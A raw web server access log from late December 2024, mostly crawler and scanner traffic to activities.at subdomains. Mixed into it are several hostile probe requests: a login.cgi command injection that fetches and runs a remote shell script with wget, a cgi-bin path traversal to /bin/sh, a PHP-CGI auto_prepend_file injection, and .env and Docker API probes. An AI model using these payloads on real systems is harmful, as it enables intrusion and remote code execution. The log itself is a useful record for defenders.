156.59.198.135 - - [27/Dec/2024:01:00:53 +0100] "GET /renault.2web.at/htdocs/binaries/10008643.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [27/Dec/2024:01:03:04 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
47.128.56.148 - - [27/Dec/2024:01:04:54 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:01:08:53 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101041503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.116.158 - - [27/Dec/2024:01:12:55 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:01:16:53 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ca.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:01:20:54 +0100] "GET /ed-test.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.40.58 - - [27/Dec/2024:01:24:55 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:01:28:54 +0100] "GET /renault.2web.at/htdocs/binaries/10231944.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:01:32:54 +0100] "GET /renault.2web.at/htdocs/binaries/10044340.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.38.100 - - [27/Dec/2024:01:36:57 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
212.244.129.12 - - [27/Dec/2024:01:43:53 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.135 - - [27/Dec/2024:01:57:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008141403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [27/Dec/2024:02:00:51 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
156.59.198.136 - - [27/Dec/2024:02:01:45 +0100] "GET /renault.2web.at/htdocs/binaries/10451228.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.34 - - [27/Dec/2024:02:14:08 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
156.59.198.135 - - [27/Dec/2024:02:18:21 +0100] "GET /ed-test.activities.at/stats/lang/awstats-nn.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:02:22:21 +0100] "GET /ed-test.activities.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
37.139.5.66 - - [27/Dec/2024:02:25:47 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
156.59.198.135 - - [27/Dec/2024:02:26:21 +0100] "GET /renault.activities.at/htdocs/binaries/renault-/rs-1342018-fr.pdf HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:02:30:21 +0100] "GET /ed-test.activities.at/stats/lang/awstats-br.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.42 - - [27/Dec/2024:02:30:53 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.186 - - [27/Dec/2024:02:31:33 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [27/Dec/2024:02:34:21 +0100] "GET /ed-test.activities.at/stats/lang/awstats-it.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:02:55:42 +0100] "GET /renault.2web.at/htdocs/binaries/10204335.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:03:11:43 +0100] "GET /ed-test.activities.at/stats/lang/awstats-gr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:03:15:43 +0100] "GET /renault.2web.at/htdocs/binaries/10089015.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [27/Dec/2024:03:19:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [27/Dec/2024:03:19:44 +0100] "GET /ed-test.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [27/Dec/2024:03:20:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [27/Dec/2024:03:23:43 +0100] "GET /renault.2web.at/htdocs/binaries/10462863.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:03:27:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104271303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:03:31:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111241603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.127.198 - - [27/Dec/2024:03:38:20 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5"
167.172.38.146 - - [27/Dec/2024:03:58:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [27/Dec/2024:04:04:29 +0100] "GET /renault.2web.at/htdocs/binaries/10661427.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [27/Dec/2024:04:04:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [27/Dec/2024:04:05:00 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch)"
156.59.198.135 - - [27/Dec/2024:04:08:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008121103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
44.220.185.243 - - [27/Dec/2024:04:25:54 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3001.83 Safari/537.32"
182.44.2.209 - - [27/Dec/2024:04:30:28 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
182.44.2.209 - - [27/Dec/2024:04:30:51 +0100] "-" 408 - "-" "-"
18.118.139.117 - - [27/Dec/2024:04:33:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
86.129.123.176 - - [27/Dec/2024:04:37:35 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
154.213.187.122 - - [27/Dec/2024:04:48:28 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
94.80.189.33 - - [27/Dec/2024:04:48:52 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
185.16.39.9 - - [27/Dec/2024:04:56:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
13.91.180.106 - - [27/Dec/2024:05:00:16 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
167.94.138.54 - - [27/Dec/2024:05:01:06 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.138.54 - - [27/Dec/2024:05:01:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.54 - - [27/Dec/2024:05:01:18 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.54 - - [27/Dec/2024:05:01:20 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.54 - - [27/Dec/2024:05:01:22 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.135 - - [27/Dec/2024:05:06:12 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image077.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.119.135.42 - - [27/Dec/2024:05:07:24 +0100] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
205.210.31.68 - - [27/Dec/2024:05:08:30 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
18.224.190.52 - - [27/Dec/2024:05:13:51 +0100] "\x16\x03\x01" 400 383 "-" "-"
18.224.190.52 - - [27/Dec/2024:05:15:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [27/Dec/2024:05:17:00 +0100] "GET /ed-test.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:05:21:01 +0100] "GET /ed-test.activities.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:05:25:00 +0100] "GET /ed-test.activities.at/stats/lang/awstats-th.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [27/Dec/2024:05:34:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.185 - - [27/Dec/2024:05:36:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
95.214.55.79 - - [27/Dec/2024:05:48:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [27/Dec/2024:05:58:54 +0100] "GET /renault.2web.at/htdocs/binaries/renault-/rs-1232017-fr.pdf HTTP/1.0" 404 314 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:06:02:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008241503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
170.249.204.186 - - [27/Dec/2024:06:05:11 +0100] "CONNECT www.google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
156.59.198.135 - - [27/Dec/2024:06:06:55 +0100] "GET /ed-test.activities.at/stats/lang/awstats-fr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [27/Dec/2024:06:17:18 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0"
162.142.125.219 - - [27/Dec/2024:06:22:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
162.142.125.219 - - [27/Dec/2024:06:22:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [27/Dec/2024:06:22:07 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [27/Dec/2024:06:22:09 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.219 - - [27/Dec/2024:06:22:11 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
95.214.53.248 - - [27/Dec/2024:06:32:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.16.39.9 - - [27/Dec/2024:06:32:24 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
148.153.45.238 - - [27/Dec/2024:06:34:08 +0100] "GET /mIs3 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [27/Dec/2024:06:34:08 +0100] "GET /F9mq HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [27/Dec/2024:06:34:09 +0100] "GET /aab8 HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [27/Dec/2024:06:34:09 +0100] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [27/Dec/2024:06:34:10 +0100] "GET /aab9 HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [27/Dec/2024:06:34:12 +0100] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
91.238.181.31 - - [27/Dec/2024:06:39:56 +0100] "\x03" 400 383 "-" "-"
147.185.133.145 - - [27/Dec/2024:06:50:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
95.214.55.43 - - [27/Dec/2024:06:55:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.207 - - [27/Dec/2024:06:58:04 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [27/Dec/2024:06:59:59 +0100] "GET /renault.2web.at/htdocs/binaries/10269838.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:07:20:01 +0100] "GET /renault.2web.at/htdocs/binaries/renault-/stellwaende03280x150finalpdf.pdf HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.53.205 - - [27/Dec/2024:07:20:13 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [27/Dec/2024:07:24:01 +0100] "GET /ed-test.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.9 - - [27/Dec/2024:07:56:56 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
205.210.31.177 - - [27/Dec/2024:08:08:38 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.98.11.155 - - [27/Dec/2024:08:10:09 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
146.19.24.18 - - [27/Dec/2024:08:16:01 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [27/Dec/2024:08:28:25 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image075.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:08:32:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911251703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
157.245.194.80 - - [27/Dec/2024:08:38:23 +0100] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/62.0.815.0 Safari/535.1"
62.234.50.184 - - [27/Dec/2024:08:47:30 +0100] "GET /containers/json HTTP/1.1" 404 360 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
62.234.50.184 - - [27/Dec/2024:08:47:31 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
62.234.50.184 - - [27/Dec/2024:08:47:31 +0100] "GET /version HTTP/1.1" 404 352 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
156.59.198.135 - - [27/Dec/2024:08:52:28 +0100] "GET /renault.2web.at/htdocs/binaries/10004943.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [27/Dec/2024:08:57:33 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [27/Dec/2024:09:08:37 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001231303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:09:12:38 +0100] "GET /renault.2web.at/htdocs/binaries/10004287.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.185 - - [27/Dec/2024:09:32:10 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [27/Dec/2024:09:48:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909171403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [27/Dec/2024:09:52:47 +0100] "GET /ed-test.activities.at/stats/lang/awstats-si.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.184.236.45 - - [27/Dec/2024:09:55:28 +0100] "GET /?p=1 HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/?p=1#comment-17864" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99 Safari/537.36"
31.184.236.45 - - [27/Dec/2024:09:55:28 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Chrome/124.0.6367.62 Not-A.Brand/99 Safari/537.36"
156.59.198.136 - - [27/Dec/2024:09:56:47 +0100] "GET /renault.2web.at/htdocs/binaries/10267576.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [27/Dec/2024:10:00:47 +0100] "GET /ed-test.activities.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [27/Dec/2024:10:04:06 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 304 - "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1901 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
